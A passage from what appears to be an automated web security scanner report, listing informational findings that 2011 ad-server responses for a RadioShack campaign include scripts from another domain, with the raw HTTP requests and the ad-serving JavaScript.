document.write ('</SCRIPT>
...[SNIP]...

18.73. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/11376353412@x90

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/11376353412@x90

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/11376353412@x90 HTTP/1.1
Host: b3.mookie1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; RMFL=011Pi745U102Og|U106t6; dlx_7d=set; dlx_XXX=set; other_20110126=set; NSC_o4efm_qppm_iuuq=ffffffff09499e2345525d5f4f58455e445a4a423660; dlx_20100929=set; id=914803576615380; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; session=1296256112|1296264723; OAX=rcHW800iZiMAAocf; Dominos=DataXuB3; ATTWL=CollectiveB3;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 05:21:01 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2661
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: application/x-javascript
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e2a45525d5f4f58455e445a4a423660;path=/

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7;sz=728x90;click0=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/648314
...[SNIP]...
RGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=');
document.write ("'");
document.write ('#000000');
document.write ("'");
document.write ('>\n');
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.7;abr=!ie;sz=728x90;click0=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/648314765/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=648314765?">
\n');
document.write ('</SCRIPT>
...[SNIP]...

18.74. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/13043720030@x90

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/13043720030@x90

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/13043720030@x90?http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950192/cstr=90959727=_4d436b32,3043720030,766161^950192^1183^0,1_/xsxdata=$XSXDATA/bnum=90959727/optn=64?trg= HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; ATTWL=CollectiveB3; NSC_o4efm_qppm_iuuq=ffffffff09419e5145525d5f4f58455e445a4a423660; session=1296256112|1296263743

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:57:06 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3183
Content-Type: application/x-javascript
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e6e45525d5f4f58455e445a4a423660;path=/

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950192/cstr=90959727=_4d436b32,
...[SNIP]...
RGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=');
document.write ("'");
document.write ('#000000');
document.write ("'");
document.write ('>\n');
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.7;abr=!ie;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950192/cstr=90959727=_4d436b32,3043720030,766161_950192_1183_0,1_/xsxdata=$XSXDATA/bnum=90959727/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/732672369/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=732672369?">
\n');
document.write ('</SCRIPT>
...[SNIP]...

18.75. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/13043720030@x90

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/13043720030@x90

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/13043720030@x90 HTTP/1.1
Host: b3.mookie1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; RMFL=011Pi745U102Og|U106t6; dlx_7d=set; dlx_XXX=set; other_20110126=set; NSC_o4efm_qppm_iuuq=ffffffff09499e2345525d5f4f58455e445a4a423660; dlx_20100929=set; id=914803576615380; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; session=1296256112|1296264723; OAX=rcHW800iZiMAAocf; Dominos=DataXuB3; ATTWL=CollectiveB3;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 05:21:01 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2670
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: application/x-javascript
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e2145525d5f4f58455e445a4a423660;path=/

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7;sz=728x90;click0=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/148711
...[SNIP]...
RGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=');
document.write ("'");
document.write ('#000000');
document.write ("'");
document.write ('>\n');
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.7;abr=!ie;sz=728x90;click0=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/1487115664/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1487115664?">
\n');
document.write ('</SCRIPT>
...[SNIP]...

18.76. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/13043720030@x90

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/13043720030@x90

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/13043720030@x90?http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950192/cstr=90959727=_4d436b32,3043720030,766161^950192^1183^0,1_/xsxdata=$XSXDATA/bnum=90959727/optn=64?trg= HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; ATTWL=CollectiveB3; NSC_o4efm_qppm_iuuq=ffffffff09419e5145525d5f4f58455e445a4a423660; session=1296256112|1296263743

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:19:46 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3183
Content-Type: application/x-javascript

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950192/cstr=90959727=_4d436b32,
...[SNIP]...
RGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=');
document.write ("'");
document.write ('#000000');
document.write ("'");
document.write ('>\n');
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.7;abr=!ie;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950192/cstr=90959727=_4d436b32,3043720030,766161_950192_1183_0,1_/xsxdata=$XSXDATA/bnum=90959727/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/670623313/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=670623313?">
\n');
document.write ('</SCRIPT>
...[SNIP]...

18.77. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/15284078472@x90

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/15284078472@x90

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/15284078472@x90?http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950192/cstr=50344343=_4d437b72,5284078472,766161^950192^1183^0,1_/xsxdata=$XSXDATA/bnum=50344343/optn=64?trg= HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; ATTWL=CollectiveB3; NSC_o4efm_qppm_iuuq=ffffffff09419e2045525d5f4f58455e445a4a423660; session=1296256112|1296266789

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:29:13 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3174
Content-Type: application/x-javascript

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950192/cstr=50344343=_4d437b72,
...[SNIP]...
RGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=');
document.write ("'");
document.write ('#000000');
document.write ("'");
document.write ('>\n');
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.7;abr=!ie;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950192/cstr=50344343=_4d437b72,5284078472,766161_950192_1183_0,1_/xsxdata=$XSXDATA/bnum=50344343/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/22038498/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=22038498?">
\n');
document.write ('</SCRIPT>
...[SNIP]...

18.78. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/17127515176@x90

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/17127515176@x90

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/17127515176@x90?http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950191/cstr=92171494=_4d4384ff,7127515176,766161^950191^1183^0,1_/xsxdata=$XSXDATA/bnum=92171494/optn=64?trg= HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; ATTWL=CollectiveB3; NSC_o4efm_qppm_iuuq=ffffffff09419e2045525d5f4f58455e445a4a423660; session=1296256112|1296270288

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:09:57 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3192
Content-Type: application/x-javascript

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950191/cstr=92171494=_4d4384ff,
...[SNIP]...
RGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=');
document.write ("'");
document.write ('#000000');
document.write ("'");
document.write ('>\n');
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.7;abr=!ie;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950191/cstr=92171494=_4d4384ff,7127515176,766161_950191_1183_0,1_/xsxdata=$XSXDATA/bnum=92171494/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/2119796835/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=2119796835?">
\n');
document.write ('</SCRIPT>
...[SNIP]...

18.79. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/17338583388@x90

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/17338583388@x90

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/17338583388@x90?http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950191/cstr=54754277=_4d437608,7338583388,766161^950191^1183^0,1_/xsxdata=$XSXDATA/bnum=54754277/optn=64?trg= HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; ATTWL=CollectiveB3; NSC_o4efm_qppm_iuuq=ffffffff09499e2345525d5f4f58455e445a4a423660; session=1296256112|1296266487

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:06:09 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3192
Content-Type: application/x-javascript
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e2045525d5f4f58455e445a4a423660;path=/

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950191/cstr=54754277=_4d437608,
...[SNIP]...
RGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=');
document.write ("'");
document.write ('#000000');
document.write ("'");
document.write ('>\n');
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.7;abr=!ie;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950191/cstr=54754277=_4d437608,7338583388,766161_950191_1183_0,1_/xsxdata=$XSXDATA/bnum=54754277/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/1681620464/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1681620464?">
\n');
document.write ('</SCRIPT>
...[SNIP]...

18.80. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/17437264561@x90

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/17437264561@x90

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/17437264561@x90?http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950191/cstr=66356808=_4d43675c,7437264561,766161^950191^1183^0,1_/xsxdata=$XSXDATA/bnum=66356808/optn=64?trg= HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; ATTWL=CollectiveB3; NSC_o4efm_qppm_iuuq=ffffffff09419e5145525d5f4f58455e445a4a423660; session=1296256112|1296262514

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:03:25 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3192
Content-Type: application/x-javascript

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950191/cstr=66356808=_4d43675c,
...[SNIP]...
RGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=');
document.write ("'");
document.write ('#000000');
document.write ("'");
document.write ('>\n');
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.7;abr=!ie;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950191/cstr=66356808=_4d43675c,7437264561,766161_950191_1183_0,1_/xsxdata=$XSXDATA/bnum=66356808/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/2037650882/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=2037650882?">
\n');
document.write ('</SCRIPT>
...[SNIP]...

18.81. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/17437264561@x90

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/17437264561@x90

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/17437264561@x90 HTTP/1.1
Host: b3.mookie1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; RMFL=011Pi745U102Og|U106t6; dlx_7d=set; dlx_XXX=set; other_20110126=set; NSC_o4efm_qppm_iuuq=ffffffff09499e2345525d5f4f58455e445a4a423660; dlx_20100929=set; id=914803576615380; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; session=1296256112|1296264723; OAX=rcHW800iZiMAAocf; Dominos=DataXuB3; ATTWL=CollectiveB3;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 05:21:00 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2670
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: application/x-javascript
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e9045525d5f4f58455e445a4a423660;path=/

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7;sz=728x90;click0=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/173834
...[SNIP]...
RGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=');
document.write ("'");
document.write ('#000000');
document.write ("'");
document.write ('>\n');
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.7;abr=!ie;sz=728x90;click0=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/1738347472/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1738347472?">
\n');
document.write ('</SCRIPT>
...[SNIP]...

18.82. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/17437264561@x90

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/17437264561@x90

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/17437264561@x90?http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950191/cstr=66356808=_4d43675c,7437264561,766161^950191^1183^0,1_/xsxdata=$XSXDATA/bnum=66356808/optn=64?trg= HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; ATTWL=CollectiveB3; NSC_o4efm_qppm_iuuq=ffffffff09419e5145525d5f4f58455e445a4a423660; session=1296256112|1296262514

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:57:02 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3192
Content-Type: application/x-javascript
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e3645525d5f4f58455e445a4a423660;path=/

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950191/cstr=66356808=_4d43675c,
...[SNIP]...
RGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=');
document.write ("'");
document.write ('#000000');
document.write ("'");
document.write ('>\n');
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
